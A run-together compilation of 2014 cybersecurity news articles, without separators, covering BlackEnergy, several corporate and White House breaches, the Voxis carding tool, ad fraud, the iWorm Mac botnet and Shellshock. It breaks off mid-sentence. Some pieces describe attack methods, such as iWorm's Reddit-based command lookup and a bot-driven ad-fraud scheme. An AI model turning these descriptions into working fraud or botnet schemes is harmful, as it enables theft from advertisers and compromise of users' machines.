THE US DEPARTMENT OF HOMELAND SECURITY Computer
Emergency Response Team (US-CERT) has warned that industrial control
systems (ICS) in the US have been compromised by the BlackEnergy malware
for at least two years.
The BlackEnergy family of malware is believed to be the same used in the cyber attack against Georgia in 2008.
It uses a malicious decoy document to hide its activities, making it easier for the hackers to mount follow-up attacks.
US-CERT said the malware campaign is sophisticated and "ongoing", and
attackers taking advantage of it have compromised unnamed ICS
operators, planting it on internet-facing human machine interfaces (HMI)
including those from GE Cimplicity, Advantech/Broadwin WebAccess, and
Siemens WinCC.
It is currently unknown whether other vendors' products have also been targeted, according to US-CERT.
"At this time, Industrial Control Systems-CERT has not identified any
attempts to damage, modify or otherwise disrupt the victim systems'
control processes," said the team in an alert.
"ICS-CERT has not been able to verify if the intruders expanded
access beyond the compromised HMI into the remainder of the underlying
control system.
"However, typical malware deployments have included modules that
search out any network-connected file shares and removable media for
additional lateral movement within the affected environment."
US-CERT describes the malware as "highly modular", and said that not all functionality is deployed to all victims.
An analysis run by the team identified the probable initial infection
vector for systems running GE's Cimplicity HMI with a direct connection
to the internet.
"Analysis of victim system artefacts has determined that the actors
have been exploiting a vulnerability (CVE-2014-0751) in GE's Cimplicity
HMI product since at least January 2012," the alert read.
On Monday, US-CERT also warned of attacks spreading the Dyre banking malware, which steals victims' credentials.
The department said that, since mid-October, a phishing campaign had
targeted "a wide variety of recipients", but elements, such as the
exploits, email themes, and claimed senders of the campaign, "vary from
target to target".
"A system infected with Dyre banking malware will attempt to harvest
credentials for online services, including banking services," the alert
warned.
T-Mobile's networks may have changed for the better — stronger
signal, faster speeds, better coverage — but what you probably didn't
know is that they're now even more secure.
In upgrading its U.S. networks, the fourth largest cellular giant in
the country also bolstered encryption in a number of cities, switching
to A5/3 encryption from the A5/1 standard on the older 2G networks,
which in some cases still carry calls or text messages when faster data
isn't available. Newer technologies, like 3G and 4G (LTE), already offer
significantly stronger encryption.
The Washington Post,
which first tested the networks in a number of cities, said New York,
Washington, and Boulder, Colorado are now using the newer standard,
covering tens of millions of customers.
Upgrading the network to the newer A5/3 encryption makes it
significantly harder to eavesdrop on calls and text messages. Even for
the National Security Agency, which reportedly is able to decode the older, legacy A5/1 encryption, may face headaches with the new standard.
T-Mobile did not comment on the encryption.
In densely populated areas, such as the cities with enhanced
encryption, monitoring cellular calls becomes more difficult — simply
because of the volume of people. The call and text data is still routed
through ground networks, but filtering it becomes difficult. The Post
explained that an "IMSI catcher," which can identify an individual cell
subscriber, can make it easier to snoop on calls and texts without
having to crack the phone or network's encryption.
AT&T said it is already ramping up its encryption efforts by
offering A5/3 encryption, but tests by the Post found in U.S. locations
where T-Mobile upgraded, AT&T had not.
In any case, AT&T is shutting down its A5/1-encrypted 2G network by 2017, and replacing it with newer technology.
According to reports, an unclassified network was breached
A White House computer network has been breached by hackers, it has been reported.
The unclassified Executive Office of the President network was attacked, according to the Washington Post.
US authorities are reported to be investigating the breach, which was reported to officials by an ally of the US, sources said.
White House officials believe the attack was state-sponsored but are not saying what - if any - data was taken.
In a statement to the AFP news agency, the White House said "some elements of the unclassified network" had been affected.
A White House official, speaking on condition of anonymity, told the Washington Post: "In the course of assessing recent threats, we identified activity of concern on the unclassified EOP network.
"Any such activity is something we take very seriously. In
this case, we took immediate measures to evaluate and mitigate the
activity. 'State-sponsored'
"Certainly, a variety of actors find our networks to be
attractive targets and seek access to sensitive information. We are
still assessing the activity of concern."
The source said the attack was consistent with a
state-sponsored effort and Russia is thought by the US government to be
one of the most likely threats.
"On a regular basis, there are bad actors out there who are
attempting to achieve intrusions into our system," a second White House
official told the Washington Post.
"This is a constant battle for the government and our
sensitive government computer systems, so it's always a concern for us
that individuals are trying to compromise systems and get access to our
networks."
The Post quoted its sources as saying that the attack was
discovered two-to-three weeks ago. Some White House staff were
reportedly told to change their passwords and there was some disruption
to network services.
In a statement given to Agence France-Presse, a White House
official said the Executive Office of the President received daily
alerts concerning numerous possible cyber threats.
In the course of addressing the breach, some White House users were temporarily disconnected from the network.
"Our computers and systems have not been damaged, though some
elements of the unclassified network have been affected. The temporary
outages and loss of connectivity for our users is solely the result of
measures we have taken to defend our networks," the official said.
The US's National Security Agency, Federal Bureau of Investigation and Security Service were reportedly investigating.
Requests for comment were referred to the Department for
Homeland Security, a spokesman for which was not immediately available. A
White House spokesman has not responded to the BBC's request for
comment.
A new cybercrime tool promises to use credit card numbers in a more
human way that is less likely to attract the attention of
fraud-detection systems, and therefore be more lucrative for those who
seek to profit from events like the Target breach.
The "Voxis
Platform" is billed as "advanced cash out software" that promises to
help carders earn "astronomical amounts" of cash by faking human
interaction with different payment gateways, authors bragged in an ad posted around underground forums and to Bitcoin payments site Satoshibox.
The operator of the Voxis Team crime group, an entity known as
Bl4ckS14y3r, has claimed the platform can funnel cash through 32 payment
gateways without human interaction and automatically create fake
customer profiles to make the transfers less suspicious.
IntelCrawler
cybercrime investigator Andrew Komarov reported the software being
flogged by Voxis Team member using the handle Conaco in October for
US$180.
"The sophisticated Voxis Platform provides the underground economy options for washing stolen credit cards," Komarov said.
"Taking
advantage of fraudulently obtained merchant accounts, bad actors can
use speed to automate and load cards to be charged for pre-determined
amounts at pre-determined times, all with the goal of sliding under
fraud detection systems.
"The emulation of human behaviour and buying patterns increases their probabilities of having charges authorised."
The Voxis Platform: a pretty UI, but is it more than carder phooey?
If the wares work as advertised it could help carders to do without money mules and stolen identities.
Supported payment gateways included Coinbase, Paypal, and WorldPay.
"Past
breaches of retailers like Target and Home Depot have created a demand
in the underground to quickly try and monetise the stolen cards,"
Komarov said. "Groups of cyber criminals actually pool their programming
resources to build tools like the Voxis Platform."
He said
IntelCrawler recommended processors bolster their know-your-customer
capabilities in respect to new merchant accounts and tighten transaction
scrubbing thresholds.
Voxis Team developers promised in the
advertisement "so advanced" it was dubbed 'fantastico Platform' that
would support Amazon EC2 and tunnelling via proxy.
Sears Holdings Corp. (SHLD)’s Kmart
discount chain, the latest victim of hacker attacks on
retailers, said it detected a security breach this week and is
investigating the incident with law enforcement officials.
The retailer’s information-technology team identified the
breach on Oct. 9 and is working with a top security firm to
assess the incursion, which happened in early September, Kmart
said in a filing yesterday. Customer payment-card information
was probably exposed by the attack.
“According to the security experts Kmart has been working
with, the Kmart store payment data systems were infected with a
form of malware that was undetectable by current anti-virus
systems,” the company said. “Kmart was able to quickly remove
the malware. However, Kmart believes certain debit and credit
card numbers have been compromised.”
A wave of data breaches at companies including Home Depot
Inc. (HD), Target Corp. (TGT) and Neiman Marcus Group Ltd. have pressured
retailers to bolster database and credit-card processing
security. Nationwide concerns about cyber intrusions have
escalated after JPMorgan Chase & Co. (JPM) recently disclosed that an
attack by hackers exposed contact information of 76 million
households and 7 million small businesses.
Kmart said it doesn’t appear that personal information,
debit-card PINs, e-mail addresses or social security numbers
were obtained by the hackers. Howard Riefs, a spokesman, was
unable to provide the number of customers affected.
‘Advanced Software’
Kmart said in the statement that it’s working closely with
federal law enforcement authorities, banking partners and IT
security firms in the ongoing investigation and is “deploying
further advanced software to protect customers’ information.”
Home Depot’s data breach between April and September put
about 56 million payment cards at risk, the company said in
September. The hackers used custom-made software to evade
detection as they infiltrated computers at stores in the U.S.
and Canada, relying on tools that haven’t been seen in previous
attacks, according to the Atlanta-based home improvement
retailer.
The company began investigating the attack on Sept. 2,
immediately after banking partners and law enforcement raised
alarms that its systems may have been infiltrated. Home Depot
has said that while payment systems were hacked, there is no
evidence that debit-card PINs have been compromised.
Discount Chain
Target has recorded $146 million in expenses as of Aug. 2
related to the discount chain’s breach in which data for 40
million accounts were stolen. Part of the expenses include an
estimate on claims yet to be made by the credit card companies.
More than 100 lawsuits have been filed against Target
relating to the breach, which contributed to the ouster of Chief
Executive Officer Gregg Steinhafel in May. The chain also blamed
the attack, which became public in December, for a sales decline
in the fourth quarter.
Hackers also have attacked Supervalu Inc. (SVU) and AB
Acquisition LLC, the operator of the Albertsons supermarket
chain.
Shares of Sears, based in Hoffman Estates, Illinois, fell 6
percent to $24.78 at the close in New York yesterday, taking its
decline for the year to 38 percent.
The parent of Kmart is struggling to revive sales growth
and is unloading assets to generate cash after nine straight
quarters of losses.
British police have access to an automated data demand system, which
is regularly used to acquire data belonging to customers of three of the
four major UK mobile networks.
According to a report first published on Friday by The Guardian,
customer data is handed over "like a cash machine" to British police,
in many cases automatically and without the direct consent each time of
the phone companies.
EE, the company behind T-Mobile and Orange, along with Vodafone and
Three give police "click of a mouse" access to tens of millions of UK
mobile customers.
A fourth operator, O2, is the only major phone network requiring
staff to review police requests, the newspaper cited the company as
saying.
Although the system "mirrors" the US PRISM program, the name of the UK program is not known.
For more than a decade, every single mobile, cellular, and landline
operator in the UK has been obligated under British law, specifically
the Regulation of Investigatory Powers Act (RIPA), to store
communications data for up to two years. That includes calls made, when,
for how long, and to whom.
RIPA was introduced in 2000, pre-dating a mass surveillance effort in
the US following the September 11 attacks a year later. It acts as the US' equivalent of the Patriot Act and the Foreign Intelligence Surveillance Act (FISA), which can force a company to hand over data — often in secret — without public judicial oversight.
Such laws have been the basis of the modern-day UK-USA agreement,
which has been used to conduct surveillance on a massive scale — not
just on citizens but also governments, politicians, private companies, and journalists.
There is little oversight for RIPA, either. A senior police officer
must give the authority to access the UK's PRISM system, but in many
cases these can be conducted without any significant checks and balances
from the British courts.
But to date, it's believed that not a single UK mobile operator has
released figures showing how many data demands they are served each year
under British surveillance laws, either through RIPA, or through
warrants or court orders.
Vodafone, however, became the first UK operator to disclose that in some countries law enforcement has "direct access" to its networks. Thanks to the new report by The Guardian, that also includes the UK.
Earlier this year, the European Court of Justice struck down a crucial data retention law that
forced phone networks to store communications data, ruling it unlawful.
The data retention laws were critical for British police and
intelligence agencies to acquire this data. It took a matter of weeks
for the British parliament to create its own emergency data retention laws to allow the UK's PRISM program to continue.
"Without these capabilities we run the risk that murderers will not
get caught, terrorist plots will go undetected, drug traffickers will go
unchallenged, child abusers will not be stopped, and slave drivers will
continue in the appalling trade in human beings," UK Home Secretary
Theresa May said at the time.
One of the more recent concerns with US surveillance laws was the
allegation that there were "two versions" of the Patriot Act: one that
was written in the public law books, and a secret interpretation developed and used by the US Justice Department.
However, by contrast, RIPA is relatively straightforward and lays out
much of what British police and intelligence agencies can do.
The UK has been working to expand its snooping powers during the
Cameron-Clegg coalition administration, but failed due to
strong opposition. But in the Queen's Speech in 2013, the proposals to
widen the tracking of people's internet and phone activities were rekindled.
These proposals, although still in Home Office development, remain vastly under wraps.
To some people, a political mission matters more than anything,
including your rights. Such people (the Bolsheviks come to mind) have
caused a great deal of damage and suffering throughout history,
especially in the last 100 years or so. Now they're taking their mission
online. You better not get in their way.
Molly Sauter, a doctoral student at McGill University and a research affiliate at the Berkman Center at Harvard ("exploring cyberspace, sharing its study & pioneering its development"), has a paper calling the use of DDOS (distributed denial of service) attacks a legitimate form of activism and protest. This can't go unchallenged.
Sauter notes the severe penalties for DDOS attacks under "...Title 18, Section 1030 (a)(5) of the US Code,
otherwise known as the CFAA" (Computer Fraud and Abuse Act). This
section is short enough that I may as well quote it here verbatim:
(5)(A) [Whoever] knowingly causes the transmission of a
program, information, code, or command, and as a result of such conduct,
intentionally causes damage without authorization, to a protected
computer; (B) intentionally accesses a protected computer without
authorization, and as a result of such conduct, recklessly causes
damage; or (C) intentionally accesses a protected computer without authorization, and as a result of such conduct, causes damage and loss.
There are other problems with the CFAA with respect to some
legitimate security research and whether it technically falls afoul of
the act, but that's not the issue here.
Sauter goes on in some detail with the penalties under Federal law
for violating this act and, no argument here, they are extreme and
excessive. You can easily end up with many years in prison. This is, in
fact, a problem generally true of Federal law, the number of crimes
under which has grown insanely in the last 30 or so years, with the
penalties growing proportionately. For an informed and intelligent rant
on the problem I recommend Three Felonies a Day by Harvey Silverglate. Back to hacktivist DDOS attacks.
She cites cases of DDOS attacks committed against Koch Industries,
Paypal, the Church of Scientology and Lufthansa Airlines, some of these
by the hacktivists who call themselves Anonymous. In the US cases of the
attacks against Koch, Paypal and the Church, the attackers received
prison time and large fines and restitution payments. In the Lufthansa
case, in a German court, the attacker was sentenced to pay a fine or
serve 90 days in jail; that sentence was overturned on appeal. The court ruled that "...the online demonstration did not constitute a show of force but was intended to influence public opinion."
This is the sort of progressive opinion, dismissive of property
rights, that Sauter regrets is not happening here in the US. She notes,
and this makes sense to me, that the draconian penalties in the CFAA
induce guilty pleas from defendants, preventing the opportunity for a
Lufthansa-like precedent.
This is part and parcel of the same outrageous growth of Federal
criminal law I mentioned earlier; you'll find the same incentive to
plead guilty, even if you're just flat-out innocent, all over the US
Code. I would join Sauter in calling for some sanity in the sentencing
in the CFAA, but I part ways with her argument that political motives
are a mitigating, even excusing factor.
Sauter's logic rises from a foundation of anti-capitalism:
...it would appear that the online space is being or has
already been abdicated to a capitalist-commercial governance structure,
which happily merges the interests of corporate capitalism with those of
the post-9/11 security state while eliding democratic values of
political participation and protest, all in the name of 'stability.'
Once you determine that capitalism is illegitimate, respect for other
people's property rights is no longer a problem. Fortunately, the law
protects people against the likes of Anonymous and other anti-capitalist
heroes of the far left.
I would not have known or cared about Sauter's article had it not been for a favorable link to it by Bruce Schneier. Schneier is a Fellow at the Berkman Center.
Progressives and other leftists who think DDOS, i.e. impeding the
business of a person or entity with whom you disagree in order to make a
political point, should consider the shoe on the other foot. If I
disagree with Schneier's positions is it cool for me to crash his web
site or those of other organizations with which he is affiliated, such
as the Berkman Center, the New America Foundation's Open Technology
Institute, the Electronic Frontier Foundation, the Electronic Privacy
Information Center and BT (formerly British Telecom)? I could apply the
same principle to anti-abortion protesters impeding access to a clinic.
I'm disappointed with Schneier for implying with his link that it's
legitimate to engage in DDOS attacks for political purposes.
It's worth repeating that Sauter has a point about the CFAA,
particularly with respect to the sentences. It does need to be
reformed — along with a large chunk of other Federal law. The point of
these laws is supposed to be to protect people against the offenses of
others, not to protect the offender.
The
closed captioning that we receive from CBS in New York for tonight's
episode of Blue Bloods was hacked and unfortunately contained profanity
and other statements that do not represent those of News 9 or CBS. We
sincerely apologize for this and the lack of captioning for our hearing
impaired viewers.
CBS is currently investigating and will implement steps to insure that this does not happen again.
A former News of the World news executive has admitted he was
involved in phone hacking, 16 months after pleading not guilty to the
crime in the Old Bailey.
Ian Edmondson’s about-turn marks the final chapter in the
phone-hacking trial that ended in June with the conviction of Andy
Coulson and the acquittal of Rebekah Brooks, both former New of the
World editors.
Edmondson, 45, spoke only to confirm his name and to say “guilty” when asked to formally enter his plea.
He was charged with conspiring to hack phones between 3 October 2000
and 9 August 2006 together with the paper’s former editor Andy Coulson
and with hacker Glen Mulcaire, the paper’s former royal editor Clive
Goodman, its former newsdesk executives Greg Miskiw, Neville Thurlbeck
and James Weatherup, the paper’s former feature writer Dan Evans, and
other persons known and unknown.
Edmondson was one of the original eight defendants at the Old Bailey
trial but, for health reasons, was deemed “unfit” to continue on the
29th day of proceedings. He was deemed fit to stand trial in July.
Before he was released from trial, the jury heard how he was one of four news editors for whom convicted hacker Mulcaire worked.
Edmondson, who is now facing the possibility of jail, was bailed and will be sentenced at a date in November.
Edmondson’s barrister Sallie Bennet-Jenkins QC told the court that
Mulcaire had frequently “bragged” about hacking and Edmondson was aware
that this was one of the tools of his trade when tasking him.
She added, however, that Edmondson had been acting “under direct instructions by senior executives to use Mulcaire”.
Mark Bryant Heron QC, for the prosecution, told the court that
Edmondson was not the most prolific tasker of Mulcaire during the
six-year phone hacking conspiracy at the paper.
At one stage he even wanted to sack him, telling his bosses that the
£2,019 a week for “special investigations” being paid to Mulcaire’s Nine
Consultancy “had to stop”.
But, said the prosecutor, once Mulcaire’s previous handler Miskiw –
also a former news editor – left the paper, Edmondson became a
“frequent” tasker of the private investigator.
Between July 2005 and August 2006 records showed there were 800 callsand texts, or 90 a month Bryant Heron said.
The court also heard for the first time of a tape recording of a
conversation between Edmondson and a News of the World colleague. The
tape was undated but from its contents it was evidence the conversation
took place following the arrest of the royal editor Clive Goodman in
2006 on suspicion of phone hacking.
The colleague said: “But you know what the vital difference is you
haven’t done anything yourself or from your number. That is not what
Clive’s caught on, he’s fucking done it himself ...”
Edmondson replied: “ Yeah – I’ve done it myself ...”
The prosecution said that Edmondson’s name was on 334 of the 8,000
notes seized from Mulcaire’s premises linking him to the hacking of
celebrities, politicians and sportspeople.
In addition to Lord Prescott, former culture secretary Tessa Jowell,
and Lord Freddie Windsor, targets linked to Edmondson’s instructions to
Mulcaire included Sienna Miller, her friend Archie Keswick and her
former boyfriend Jude Law, and George Best’s son Callum Best, the court
heard.
He also employed Mulcaire to investigate Sir Paul McCartney and Heather Mills in May 2006.
The NoW published nine articles about the couple between over one
month, said Bryant Heron. “Ian Edmondson wished, unsurprisingly, to get
information on the marital break-up. He employed Mulcaire to do so.”
He told the court: “There was an aggressive newsgathering culture.
The end justified the means to get results, to get the story, in an
extremely competitive market.”
Edmondson worked for the paper in the 1990s, and then rejoined the
tabloid’s news desk in 2004, becoming news editor in 2005, a position he
held until he was suspended in December 2010 and subsequently dismissed
for gross misconduct in January 2011.
He was in charge when Mulcaire and the paper’s royal editor Clive Goodman were arrested in August 2006 on suspicion of hacking.
His suspension four years later came after three emails implicating
him in Mulcaire’s hacking came to light. These suggested that hacking
was not confined to Goodman, who the company had claimed was operating
as a single “rogue reporter” and led to the launch of Operation Weeting,
Scotland Yard’s phone-hacking investigation in January 2011.
They contained the mobile and pin numbers for Joan Hammell, a special
adviser to Lord Prescott, former culture secretary Tessa Jowell and
royal Freddie Windsor.
The jury heard that during Edmondson’s reign on the news desk the
paper also hacking rival journalists on the Mail on Sunday in an attempt
to discover what they knew about Prescott’s affair with his diary
secretary Tracey Temple in a “dog-eat-dog” fight for stories.
After the paper hacked Temple and her ex-husband and got nowhere, the
prosecution said that Edmondson then got hold of Hammell’s number and
passed it to Mulcaire. Mulcaire went on to get her pin and listened to
45 messages. He then emailed Edmondson telling him: “This is how you can
hack the phone so that you too can hear them”, according to emails
disclosed during the trial.
“In the dog-eat-dog world of journalism, in this frenzy to get the
huge story and to try to get something other than everybody else, that
is what you do, we suggest, if you are Ian Edmondson – you hack the
competition,” prosecutor Andrew Edis QC told jurors in his opening
speech.
One defendant had claimed that hacking was so widespread that
Edmondson was even accessing Coulson’s voicemail to find out which
stories he favoured.
When Mulcaire’s home was raided by police in 2006, officers
discovered a large cache of notes recording who had tasked him to hack
phones, including “Ian”.
His decision to plead guilty means that eight of the 10 so far
charged and dealt with for phone hacking at the NoW have been convicted
or pleaded guilty.
Before the trial had got underway had sought disclosure of internal emails distancing himself from the work of Mulcaire.
He sought the emails to prove that he thought Mulcaire was
“inefficient” and “a waste of money” and wanted him sacked and that
after he arrived at NoW in November 2004 that he cut down on the cash
payments.
Editor’s note:Noam Schwartz is leading Business
Development in SimilarWeb. His previous company Tapdog was acquired by
SimilarWeb in the beginning of 2014.
Ad fraud is a well-known “secret” in the online marketing world, and
it’s been around ever since ads have existed on the Internet. Experts
estimate that for every $1 a company spends on online advertising,
almost half is lost to digital ad fraud.
But in 2014, ad fraud has taken center stage. This month the Interactive Advertising Bureau (IAB) released their “Anti-Fraud Principles,”
meant to reduce robotic traffic, or bots, and other forms of online
traffic fraud. And earlier this year, IAB chairman and Ziff Davis CEO
Vivek Shah publicly admitted that 36% of all web traffic is non-human traffic. (Other ad execs say it’s closer to 50%.)
What more, the problem seems to be growing. Last year, Google disabled ads from more than 400,000 sites hiding malware, up from 123,000 sites in 2012.
Bots, Stuffing, and Stacking Scams
So how exactly do fraudsters hijack your marketing budget?
Unfortunately, there are a lot of ways to perpetrate traffic fraud,
including the following:
Clickjacking malware. This kind of malware sends real users to
websites they never planned to visit in the first place. Another method
is to have bots imitate real users by “clicking” on ads or repeatedly
loading a page.
iFrame stuffing. iFrame stuffing compresses an ad into a tiny
one-by-one pixel size. The ad is served up on a site as a real ad and
reported as a view, even though a real user would never be able to view
such a tiny ad.
Ad stacking. In this type of scam, multiple ads are placed on top
of each other in a single ad placement. Only the top ad is in view, but
all of the ads are reported as viewed.
These kinds of traffic fraud manipulate metrics like page views and
click-through rate, making cost-per-impression a dangerous pricing model
for advertisers.
To get an idea of just how dangerous it can be, let’s look at one of
the most elegant scams out there today, one that works using illegal bot
activity. To set up the scam, a fraudster could create a magazine-style
website for the sole purpose of hosting ads. Content is added
automatically from content farms or copied from real publishers.
Then, the fraudster distributes malicious software (or piggybacks on
existing ones), that causes the infected computers to open numerous
browser windows in the background, completely hidden from the user.
The browsers are directed to the fraudster’s fake webpage and emulate
human behavior by hopping from link to link, virtually moving the
cursor, scrolling, and occasionally clicking on ads.
Here you can see a video of illegal bots in action:
So here’s where advertisers take a hit in the marketing budget. Let’s
say that the fraudster manages to distribute malicious software to just
100,000 computers. If each of these computers opens 50 hidden browsers
every day, spending 30 seconds on each page and clicking an ad once
every 200 pages, the fraudster can generate 72 million fake clicks in a
single day! And advertisers are paying for every one of those clicks.
Online Ads Are Easy Targets
Online advertising is a fraudster’s heaven, and even the savviest advertisers lose millions of dollars each month.
So what makes ads so easy to target?
For one thing, advertisers often have no idea fraud has even
occurred. Typically, advertisers only get standard metrics on their ad
campaigns, like cost per lead and conversion rate. There’s no way to
detect ad fraud or to know just how much it cost you because it’s just
rolled into the cost of acquiring real customers.
Also, ad networks don’t ask a lot of questions when a new ad
publisher registers their site. Usually the ad network only asks for a
publisher’s basic traffic, engagement, and demographic stats, and that’s
it. Then the publisher gets the code that will allow them to present
ads from the ad network inventory. The ad networks have nothing to
lose—if the publisher generates clicks, it’s a win. If not, the ad
server will push the ads elsewhere.
Finally, those same ad networks actually benefit from ad fraud. They
get paid for each click or impression, regardless of whether the ad is
served to a real person or a fraudulent bot. So eliminating 36-50% of
those bad clicks would negatively affect their bottom line.
What Advertisers Can Do About Ad Fraud
Few substantial and scalable solutions exist for ad fraud.
Ad fraud detection companies such as Telemetry, Forensiq, White Ops,
Spider.io (recently acquired by Google), and SimilarWeb’s Traffic
Guardian use several approaches, including comparing visit patterns with
known behavior, monitoring malicious software, proxy unmasking, device
verification, and manipulation recognition.
For instance, an algorithm can determine whether a website is
legitimate or fraudulent by comparing the way real people are using that
website to actual online behavior. Advertisers can view that data
themselves, which can help them decide whether one of their publishers
needs to be red-flagged, or even rejected immediately.
Unfortunately, the outcome of the online ad game will not decided by a
knockout. New technologies and state-of-the-art algorithms are
continually being developed both by fraudsters and those trying to fight
them.
And while it’s promising that agencies and publishers have started
talking about the problem, advertisers have to be involved, too. After
all, they’re the ones with the most skin in the game.
A cyberattack this summer on JPMorgan Chase
compromised the accounts of 76 million households and seven million
small businesses, a tally that dwarfs previous estimates by the bank and
puts the intrusion among the largest ever.
The details of the breach — disclosed in a securities filing
on Thursday — emerge at a time when consumer confidence in the digital
operations of corporate America has already been shaken. Target, Home Depot
and a number of other retailers have sustained major data breaches.
Last year, the information of 40 million cardholders and 70 million
others were compromised at Target, while an attack at Home Depot in
September affected 56 million cards.
But unlike retailers,
JPMorgan, as the largest bank in the nation, has financial information
in its computer systems that goes beyond customers’ credit card details
and potentially includes more sensitive data.
“We’ve migrated so
much of our economy to computer networks because they are faster and
more efficient, but there are side effects,” said Dan Kaminsky, a
researcher who works as chief scientist at White Ops, a security
company.
Until just a few weeks
ago, executives at JPMorgan said they believed that only one million
accounts were affected, according to several people with knowledge of
the attacks.
As the severity of the
intrusion — which began in June but was not discovered until July —
became more clear in recent days, bank executives scrambled for the
second time in three months to contain the fallout and to reassure
skittish customers that no money had been taken and that their financial
information remained secure.
The hackers appeared
to have obtained a list of the applications and programs that run on
JPMorgan’s computers — a road map of sorts — which they could crosscheck
with known vulnerabilities in each program and web application, in
search of an entry point back into the bank’s systems, according to
several people with knowledge of the results of the bank’s forensics
investigation, all of whom spoke on the condition of anonymity.
Operating overseas,
the hackers gained access to the names, addresses, phone numbers and
emails of JPMorgan account holders. In its regulatory filing on
Thursday, JPMorgan said that there was no evidence that account
information, including passwords or Social Security numbers, had been taken. The bank also noted that there was no evidence of fraud involving the use of customer information.
Still, until the
JPMorgan breach surfaced in July, banks were viewed as relatively safe
from online assaults because of their investment in defenses and trained
security staff. Most previous breaches at banks have involved stealing
personal identification numbers for A.T.M. accounts, not burrowing deep
into the internal workings of a bank’s computer systems.
Even if no customer
financial information was taken, the apparent breadth and depth of the
JPMorgan attack shows how vulnerable Wall Street institutions are to
cybercrime. In 2011, hackers broke into the systems of the Nasdaq stock market, but did not penetrate the part of the system that handles trades.
Jamie Dimon,
JPMorgan’s chairman and chief executive, has acknowledged the growing
digital threat. In his annual letter to shareholders, Mr. Dimon said,
“We’re making good progress on these and other efforts, but cyberattacks
are growing every day in strength and velocity across the globe.”
Even though the bank
has fortified its defenses against the attacks, Mr. Dimon wrote, the
battle is “continual and likely never-ending.”
On Thursday, some
lawmakers weighed in. Edward J. Markey, Democrat of Massachusetts and a
member of the Senate Commerce Committee, said “the data breach at
JPMorgan Chase is yet another example of how Americans’ most sensitive
personal information is in danger.”
Hackers drilled deep
into the bank’s vast computer systems, reaching more than 90 servers,
the people with knowledge of the investigation said. As they analyze the
contours of the breach, investigators in law enforcement remain
puzzled, partly because there is no evidence that the attackers looted
any money from customer accounts.
That lack of any
apparent profit motive has generated speculation among the law
enforcement officials and security experts that the hackers, which some
thought to be from Southern Europe, may have been sponsored by elements
of the Russian government, the people with knowledge of the
investigation said.
By the time the bank’s
security team discovered the breach in late July, hackers had already
obtained the highest level of administrative privilege to dozens of the
bank’s computer servers, according to the people with knowledge of the
investigation. It is still unclear how hackers managed to gain such deep
access.
The people with
knowledge of the investigation said it would take months for the bank to
swap out its programs and applications and renegotiate licensing deals
with its technology suppliers, possibly giving the hackers time to mine
the bank’s systems for unpatched, or undiscovered, vulnerabilities that
would allow them re-entry into JPMorgan’s systems.
Beyond its
disclosures, JPMorgan did not comment on what its investigation had
found. Kristin Lemkau, a JPMorgan spokeswoman, said that describing the
bank’s breach as among the largest was “comparing apples and oranges.”
Preparing for the disclosure on Thursday, JPMorgan retained the law firm WilmerHale to help with its regulatory filing with the Securities and Exchange Commission,
people with knowledge of the matter said. Earlier on Thursday, some
executives — Barry Sommers, the chief executive of Chase’s consumer bank
— flew back to New York from Naples, Fla., where they had convened for a
leadership conference, these people said.
The initial discovery of the hack sent chills down Wall Street and prompted an investigation by the Federal Bureau of Investigation. The bank was also forced to update its regulators, including the Federal Reserve, on the extent of the breach.
Faced with the rising
threat of online crime, JPMorgan has said it plans to spend $250 million
on digital security annually, but had been losing many of its security
staff to other banks over the last year, with others expected to leave
soon.
A RUSSIAN SECURITY FIRM has
discovered a botnet that has hit over 17,000 Apple Mac computers, using
information posted in messages on social media website Reddit to
navigate.
Researchers at Russian antivirus company Dr Web said in a report
that the sophisticated "multi-purpose backdoor" malware that it dubbed
"Mac.Backdoor.iWorm" has infected more than 17,000 computers running Mac
OS X by allowing criminals to issue commands to carry out a wide range
of instructions on the infected machines.
"Criminals developed this malware using C++ and Lua. It should also
be noted that the backdoor makes extensive use of encryption in its
routines," said Dr Web in its report. "During installation it is
extracted into /Library/Application Support/JavaW, after which the
dropper generates a p-list file so that the backdoor is launched
automatically."
Compromised computers receive commands from servers under the control
of botmasters using information posted in messages on Reddit as
navigational aids. Then Mac.Backdoor.iWorm opens a port on an infected
computer and awaits an incoming connection. It sends a request to a
remote website to acquire a list of command and control (C&C)
servers, and then connects to the remote servers and waits for
instructions.
"It is worth mentioning that in order to acquire a control server
address list, the bot uses the search service at reddit.com, and - as a
search query - specifies hexadecimal values of the first 8 bytes of the
MD5 hash of the current date," said Dr Web. "The reddit.com search
returns a web page containing a list of botnet C&C servers and ports
published by criminals in comments to the post minecraftserverlists
under the account vtnhiaovyd."
Security expert Graham Cluely said on his blog that while it isn't presently documented how the malware spreads, the consequences clearly can be serious.
"Like any computers that have been recruited into a botnet, Macs that
have been hijacked in this attack could have information stolen from
them, further malware planted upon them, or be used to spread more
malware or launch spam campaigns and denial of service attacks," Cluley
explained.
Security firm Lancope CTO TK Keanini added that the botnet "will
begin to co-evolve as countermeasures are put in place and they
engineering and innovate around them".
The US Defense Advanced Research Projects Agency (DARPA) has warned that users of the internet will never be fully secure.
DARPA director Arati Prabhakar made the claim during the Washington Post's
Cybersecurity Summit, arguing that the only way fully to secure the
internet is to seal it off and make it available only to selected
people.
"The power of information technology, and the reason we put up with
all these problems, is that it is phenomenally capable for all the
things that change how we live and how we work and how we create
national security," she said.
"You don't want to cut out any of that capability in the process of building cyber security."
Prabhakar added that, while wholly securing the internet is
impossible, DARPA is working on new ways to track hackers and criminals
operating on the Dark Web.
She listed the need for increased computing power and more advanced,
scalable big data analytics tools as key challenges in this endeavour.
"[When searching for cyber criminals] you start by creating a
different way to look at this vast information environment," she said.
"The moon shot for cyber security, in my view, is to find techniques that scale faster than the explosion in information."
Prabhakar revealed that DARPA began working on advanced big data solutions in March, and is also working on several projects designed to bolster global cyber security levels.
She highlighted a research project to create an "unhackable system"
as particularly important owing to its potential application in critical
infrastructure.
"What [the unhackable software project] means is there is a
mathematical proof that this particular function can't be hacked from a
pathway that wasn't intended," she said. "That won't solve the entire
problem, but it might make it more manageable."
Attacks on critical infrastructure are a problem facing governments
across the globe owing to their use of insecure SCADA systems.
These concerns peaked in September when researchers uncovered a critical bug, codenamed Shellshock, in the bash code used in Unix and Unix-like systems that could theoretically be exploited to hack SCADA systems.
Malicious and benign attacks against systems vulnerable to Shellshock
had halved by Sunday after peaking three days following the bug's
disclosure, Akamai researchers say.
The variety of payloads
targeting vulnerable sites increased dramatically over the same period
before tapering off, in a possible sign that hackers were bored with the
bug.
The number of unique payloads increased from 43 on day zero to a
whopping 10,716 just 24 hours later. It peaked on 27 September at 20,753
before falling off.
The numbers demonstrated the effectiveness of
Shellshock as an attack vector, researchers Ezra Caltum, Adi Ludmer and
